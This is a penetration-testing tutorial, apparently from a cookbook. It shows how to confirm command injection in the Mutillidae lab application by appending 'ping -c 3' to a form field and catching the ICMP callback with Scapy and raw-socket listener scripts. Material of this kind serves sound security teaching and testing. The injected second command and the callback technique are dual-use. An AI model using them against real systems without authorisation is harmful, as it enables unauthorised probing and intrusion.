How to do it...

In the following steps we will be creating a custom script for validating remote code-execution vulnerabilities with ICMP traffic:

  1. It is possible to validate a command-injection vulnerability in a web application by executing commands that will force the backend system to send ICMP traffic to a listening service. The received ICMP echo requests can be used to identify vulnerable systems. The following is an example of a Python script that uses the Scapy library to do just that:
    #!/usr/bin/env python3

    import logging
    logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
    from scapy.all import *

    # Address of the host running this listener (change it to your own)
    LISTENER_IP = "172.16.69.133"

    def rules(pkt):
        # Report the source of every ICMP echo request (type 8) addressed to us
        try:
            if pkt[IP].dst == LISTENER_IP and pkt[ICMP].type == 8:
                print(str(pkt[IP].src) + " is exploitable")
        except IndexError:
            # Packet has no IP or ICMP layer; ignore it
            pass

    print("Listening for Incoming ICMP Traffic. Use Ctrl+C to stop listening")

    # Capture only ICMP and hand each packet to rules() via prn (a callback,
    # not a filter); store=0 keeps the capture from accumulating in memory
    sniff(filter="icmp", prn=rules, store=0)
  2. After the ICMP listener has been started, we need to make the vulnerable server send an ICMP echo request to our listening service. This is done by injecting a ping command into the user input that is vulnerable to command injection.
  3. In Mutillidae, there is a vulnerable function that performs DNS enumeration by passing user input to a direct system call. A separate ping request can be appended to the user input by using a semicolon, for example `www.example.com; ping -c 3 172.16.69.133`, where 172.16.69.133 is the address of the host running the listener. The `-c` count matters: without it, Linux `ping` runs until interrupted, so the injected command (and the HTTP request that triggered it) never finishes. The injection is shown in the following screenshot:
  4. Assuming that the server is vulnerable to command injection, the Python listener should print the server's source address followed by "is exploitable", indicating that the ICMP echo request was received and that the target is likely to be vulnerable. Note that the absence of a callback does not prove the input is safe: the server may have outbound ICMP filtered, may not be able to route to the listener, or may not have `ping` installed, in which case a DNS or HTTP callback is the usual fallback.
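The whole procedure, listener and injected payload together, as an added example that is not code from the original page. It uses a raw socket instead of Scapy so it has no third-party dependency, and it only counts ICMP echo requests addressed to the listener, so stray replies or unreachable messages on the network are not mistaken for a callback. Assumptions: the listener runs as root on Linux, `LISTENER_IP` is the attacker host's address (the same value the page's script checks), and the Mutillidae form field name `target_host` is a guess that may need changing for your copy of the application.

```python
#!/usr/bin/env python3
"""Added example: ICMP call-back check for OS command injection.

Not from the original page. Uses a raw socket instead of Scapy so it has no
third-party dependency. Assumptions: the listener runs as root on Linux,
LISTENER_IP is the attacker host's address, and the Mutillidae form field
name (target_host) is a guess and may differ in your installation.
"""
import socket
import struct
import urllib.parse

LISTENER_IP = "172.16.69.133"   # host running the listener (same value as the page's script)
ICMP_ECHO_REQUEST = 8           # ICMP type of an echo request


def build_injection(benign_value, listener_ip=LISTENER_IP, count=3):
    """Value to submit in the vulnerable field.

    The semicolon terminates the command the application meant to run (for
    example a DNS lookup of benign_value) and appends our ping. -c bounds the
    number of pings so the injected command, and the HTTP request, terminate.
    """
    return f"{benign_value}; ping -c {count} {listener_ip}"


def form_body(payload, field="target_host"):
    """URL-encoded POST body for the vulnerable form (field name is an assumption)."""
    return urllib.parse.urlencode({field: payload})


def parse_ipv4_icmp(frame):
    """Parse an IPv4 packet as delivered by a raw ICMP socket (IP header included).

    Returns (src_ip, dst_ip, icmp_type, icmp_code), or None if the bytes are
    not a well-formed IPv4/ICMP packet.
    """
    if len(frame) < 20:
        return None
    ver_ihl, _tos, _len, _id, _frag, _ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", frame[:20])
    if ver_ihl >> 4 != 4 or proto != socket.IPPROTO_ICMP:
        return None
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or len(frame) < ihl + 4:
        return None
    icmp_type, icmp_code = struct.unpack("!BB", frame[ihl:ihl + 2])
    return socket.inet_ntoa(src), socket.inet_ntoa(dst), icmp_type, icmp_code


def exploitable_source(frame, listener_ip=LISTENER_IP):
    """Return the source address if frame is an echo request to us, else None.

    Only echo requests count: echo replies or unreachable messages bouncing
    around the network are not evidence that our injected ping ran.
    """
    parsed = parse_ipv4_icmp(frame)
    if parsed is None:
        return None
    src, dst, icmp_type, _code = parsed
    if dst == listener_ip and icmp_type == ICMP_ECHO_REQUEST:
        return src
    return None


def listen(listener_ip=LISTENER_IP):
    """Block on a raw ICMP socket and report each distinct host that pings us (needs root)."""
    seen = set()
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as sock:
        print("Listening for incoming ICMP traffic. Use Ctrl+C to stop listening")
        while True:
            frame, _addr = sock.recvfrom(65535)
            src = exploitable_source(frame, listener_ip)
            if src and src not in seen:      # -c 3 sends three pings; report the host once
                seen.add(src)
                print(f"{src} is exploitable")


# Constructed test packet (not a real capture): 20-byte IPv4 header followed by
# an 8-byte ICMP echo request from 172.16.69.150 to the listener. Checksums are
# left as zero because the parser does not verify them.
SAMPLE_ECHO_REQUEST = (
    struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0x1234, 0, 64, socket.IPPROTO_ICMP, 0,
                socket.inet_aton("172.16.69.150"), socket.inet_aton(LISTENER_IP))
    + struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, 1, 1)  # type, code, checksum, id, seq
)

if __name__ == "__main__":
    print("Submit this in the vulnerable field:", build_injection("www.example.com"))
    print("POST body:", form_body(build_injection("www.example.com")))
    listen()
```

Start the listener on the attacker host first, then submit the output of `build_injection()` in the vulnerable field; each server that runs the injected ping is reported once by its source address. A raw socket sees every ICMP packet the host receives, which is why the check insists on type 8 and on the destination being the listener; on a busy network an echo reply to someone else's ping would otherwise be reported as a vulnerable host.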